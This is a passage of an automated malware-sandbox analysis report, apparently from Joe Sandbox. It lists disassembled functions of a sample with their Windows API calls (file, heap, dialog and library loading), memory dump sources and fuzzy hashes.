Instruction Fuzzy Hash: 68312D3190422AAFDB21EFACD440BDD77F5EF40325F2541DAE5849B2A1EB765D40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01001E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01001E55

Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF

_wcslen.LIBCMT ref: 01001EFD

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 8e1c048bd7c30165f6147f51207ed52ae0eb9ae6586af5f90764804b385895a8
Instruction ID: e5c9adad6ff5dd0153a5b92cc96599982bf1690653ebffbaffdfee554a6e74f8
Opcode Fuzzy Hash: 8e1c048bd7c30165f6147f51207ed52ae0eb9ae6586af5f90764804b385895a8
Instruction Fuzzy Hash: 92312C7190410A9FEF16DF98C944AEEBBF5BF58304F10009DE585A7290C7369E15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01009DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
Instruction ID: 9d7a2f22e67313912af0d7f27b090b44b064072031fe6cfd9ec0339a49277ed1
Opcode Fuzzy Hash: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
Instruction Fuzzy Hash: 602128312882869FE716DF38C491AABBFE8AF51308F08495DF5C987182D339D90DCB61

Uniqueness

Uniqueness Score: -1.00%

Function 0100966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01009F27,?,?,0100771A), ref: 010096E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01009F27,?,?,0100771A), ref: 01009716

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
Instruction ID: afe85808430fbd69eac987090d6ecf19bd39f063ff70a4f5062835919f52a8bd
Opcode Fuzzy Hash: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
Instruction Fuzzy Hash: 5221B0715043446FF3718A69CC88BE7B7DCEB49328F000A19FADAC65C6C778A884C631

Uniqueness

Uniqueness Score: -1.00%

Function 01009E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 01009EC7
GetLastError.KERNEL32 ref: 01009ED4

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
Instruction ID: eebab815987d1a6cb08529afbc0710887e3d1c3d3ade0c4db6194a97a0a7c768
Opcode Fuzzy Hash: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
Instruction Fuzzy Hash: F31129306007009BF736C628C884BA6B7E9AB44324F50066AE1D7D25D2D371FD45C760

Uniqueness

Uniqueness Score: -1.00%

Function 01028E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01028E75

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,01024286,?,0000015D,?,?,?,?,01025762,000000FF,00000000,?,?), ref: 01028E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01041098,010017CE,?,?,00000007,?,?,?,010013D6,?,00000000), ref: 01028EB1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 23fef1a807f26f54be0002ac21a5a9f01bb8a2d5ca37984b3611cd11567d32c4
Instruction ID: 720aae6f796c395268371445326ddd5f49e266975745dca50c8381c85006ceac
Opcode Fuzzy Hash: 23fef1a807f26f54be0002ac21a5a9f01bb8a2d5ca37984b3611cd11567d32c4
Instruction Fuzzy Hash: 28F0F63A60113666EF712A299C04BAF3BDC8FD1B70F14C167E9D4AB1A0DB71D80082A1

Uniqueness

Uniqueness Score: -1.00%

Function 0101109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 010110AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 010110B2

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
Instruction ID: 21b0b98479194364472a30493d2ee0ad574a45758da9e8ffa8ad674cd6026171
Opcode Fuzzy Hash: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
Instruction Fuzzy Hash: CDE09232F00145A78F1E86B898159EBB6DDEB4410431442B9F683D7109F9B9D90147A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
Instruction ID: dfecebb3c25db30f3a306a5fe564f37bbcbf9af66a54902cfd2954a1a09ce2ea
Opcode Fuzzy Hash: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
Instruction Fuzzy Hash: DCF0A03220020EBBEF125E60DC80FDA37ACBF04386F448050B984D6194DB72DA94DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0100A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
Instruction ID: 250eb872ac89ff47c26f0ed0e59c379980176d0260efe9afa50024a3bcd7ff0b
Opcode Fuzzy Hash: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
Instruction Fuzzy Hash: 86E09235240219BBEB125E64DC84FDA779CBF083C2F484061B984D6094EB66D984DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,01032641,000000FF), ref: 0101ACB0
OleUninitialize.OLE32(?,?,?,?,01032641,000000FF), ref: 0101ACB5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
Instruction ID: 0c719d34694ec5a249f6c3af8ed90ed3625840bd0b588d3d89010c0fb862b74a
Opcode Fuzzy Hash: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
Instruction Fuzzy Hash: DAE06572604650EFC7119B59D845B49FBBCFB88E20F00426AE456D7764CB786800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A254

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A280

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
Instruction ID: 6c71e386091b5bdf15c179c71d1aff966f09c5afab805abd46f3b72d8e2a1d1d
Opcode Fuzzy Hash: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
Instruction Fuzzy Hash: C1E092356001289BEB62AB68CC04BD9BB9CAB193E1F0442B1FEC4E71C4DA75DD44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0101DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0101DEEC

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(00000065,?), ref: 0101DF03

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(0001042C,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 57b8f12fa92731e4166c5bdcb09e6fae0f4c1cdbd25d05dec5aab7f7fe7b870d
Instruction ID: 1f5f3ccfaf945375bf1b625b4b1d4cacb1a305ed9fc8e4cfaa4704c6759713d9
Opcode Fuzzy Hash: 57b8f12fa92731e4166c5bdcb09e6fae0f4c1cdbd25d05dec5aab7f7fe7b870d
Instruction Fuzzy Hash: DAE022B640024837EF12ABA0DC05FDE3BAC5B14385F040C92B380EA0E2DA3DEA108760

Uniqueness

Uniqueness Score: -1.00%

Function 0101081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
Instruction ID: 22e2e2a25e81002e0623cd0a974ceeb2be398cfe2c0ac787b5441860d31de914
Opcode Fuzzy Hash: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
Instruction Fuzzy Hash: 52E048765002186BDB11A694DC44FDABBACFF093D1F0400657AC5D2048D678D6C4CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0101A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0101A3E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
Instruction ID: 23d3827fdd94843ec17865931beb3aa99bafda72f3863520f4b14d8d68d07ee4
Opcode Fuzzy Hash: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
Instruction Fuzzy Hash: EFE0ED71501219EBDB51DF59C5407DEBBE8FB14260F10C05AA88697204E2B8AA04DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01022B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01022BB5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
Instruction ID: e7c785687a0f8a4355ed3da6b01cbf429825379159570fce305615d4bcd914ea
Opcode Fuzzy Hash: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
Instruction Fuzzy Hash: 99D02234198332185C6B3EFA38065CD338ABD51B79BE003DEE8E08E8C1EE1990409211

Uniqueness

Uniqueness Score: -1.00%

Function 010012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 01001306
ShowWindow.USER32(00000000), ref: 0100130D

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
Instruction ID: a782aa06b10ed4b03b03cbbc244e87ccace00316b49aae77fcd4b5e3ab742883
Opcode Fuzzy Hash: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
Instruction Fuzzy Hash: 32C0123245C200FECB010BB4DC0AC2BBBB8BBA6312F04C908F0E9C8064C23EC010DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01001A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01001A09

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
Instruction ID: fe4d38d393a194c0a53231235e5716946bc7e6383fb83103c02cfbfdec819026
Opcode Fuzzy Hash: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
Instruction Fuzzy Hash: F6C1AF30A006559BFF66EF68C494BA97BE5AF05310F0801FAED859F2C6DB31D944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01003BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01003BBF

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f9021871e2ad40a18533b0f1ac8a1054b0fae2de999ce67e3d694870cc06eb51
Instruction ID: 56fb610919c4082d76d3dc5e0a3f029569259108a51299a64f476c77603556db
Opcode Fuzzy Hash: f9021871e2ad40a18533b0f1ac8a1054b0fae2de999ce67e3d694870cc06eb51
Instruction Fuzzy Hash: 5D71B471540B859EEB27DB74C8549EBB7E9AF24300F40496EE6EB8B2C1DA326584CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01008284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01008289

Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1

